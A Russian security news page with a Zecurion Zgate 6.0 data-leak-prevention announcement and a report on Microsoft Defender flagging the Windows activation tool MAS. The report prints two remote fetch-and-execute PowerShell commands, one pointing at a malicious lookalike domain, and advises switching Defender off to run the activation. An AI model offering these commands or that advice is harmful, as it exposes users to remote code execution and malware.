Zecurion выпустила Zgate 6.0 с агентом для контроля удалённых пользователей и расширенным списком отчётов

Zecurion выпустила Zgate 6.0 с агентом для контроля удалённых пользователей

Компания Zecurion, представляет обновление для своего флагманского сетевого решения Zecurion Zgate с возможностью контроля удалённых пользователей и новейшими технологиями анализа информации.

По статистике Zecurion Analytics количество удалённых и мобильных сотрудников ежегодно растёт на 15–20 % и уже в 2015 году составит более 5 млн человек только в России. Zecurion первым из российских разработчиков DLP выпустил специальный агент Zgate для защиты от утечек информации с портативных и домашних компьютеров сотрудников, находящихся вне офиса.

Zecurion Zgate Agent позволяет непосредственно на компьютере пользователя перехватывать и анализировать информацию, которую сотрудники получают и отправляют через корпоративную и личную электронную почту, социальные сети и мессенджеры. Для анализа информации используются все встроенные в Zecurion Zgate технологии от проверки по словарям до метода опорных векторов SVM. При обнаружении нарушений Zecurion Zgate Agent может запретить передачу, пропустить данные, сохранить их копию в архиве, а также уведомить офицера безопасности.

В шестой версии появилось сразу несколько нововведений в функционал обнаружения утечек и анализа данных. Теперь Zecurion Zgate умеет создавать цифровые отпечатки баз данных и распознавать фрагменты хранящейся там информации. Можно настроить блокировку писем, которые содержат, например, персональные данные более чем пяти клиентов организации. При этом порядок следования информации, полей и записей не имеет значения. Также в Zecurion Zgate 6.0 появился поиск с учётом звучания слов, что позволит более эффективно анализировать тексты со случайными ошибками или даже с намеренными искажениями.

Модуль отчётности Zecurion Reports пополнился массой готовых шаблонов для различных отраслей. Существенно расширились возможности разграничения доступа к отчётам, а также настройки их автоматической генерации и отправки офицерам безопасности. Дополнительными возможностями Zecurion Zgate стали категоризация интернет-ресурсов по тематике и дальнейшая блокировка доступа к ним в зависимости от политик безопасности.

«Шестая версия изначально задумывалась как «архитектурная». Именно в рамках неё мы выпустили общий сервер управления и ввели несколько новых ролей для серверных модулей, например, для оптимизации распознавания текста в графических файлах можно установить OCR-сервер, который получает файлы с изображениями от других компонентов Zgate и возвращает извлечённый из этих файлов текст, — говорит Алексей Раевский, генеральный директор Zecurion. — Функциональные возможности нового поколения продуктов создали для нас комфортную ситуацию, когда мы по многим параметрам впереди конкурентов. Надеемся, этого задела хватит, чтобы оставаться лидерами DLP-рынка до анонса следующего поколения решений».

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru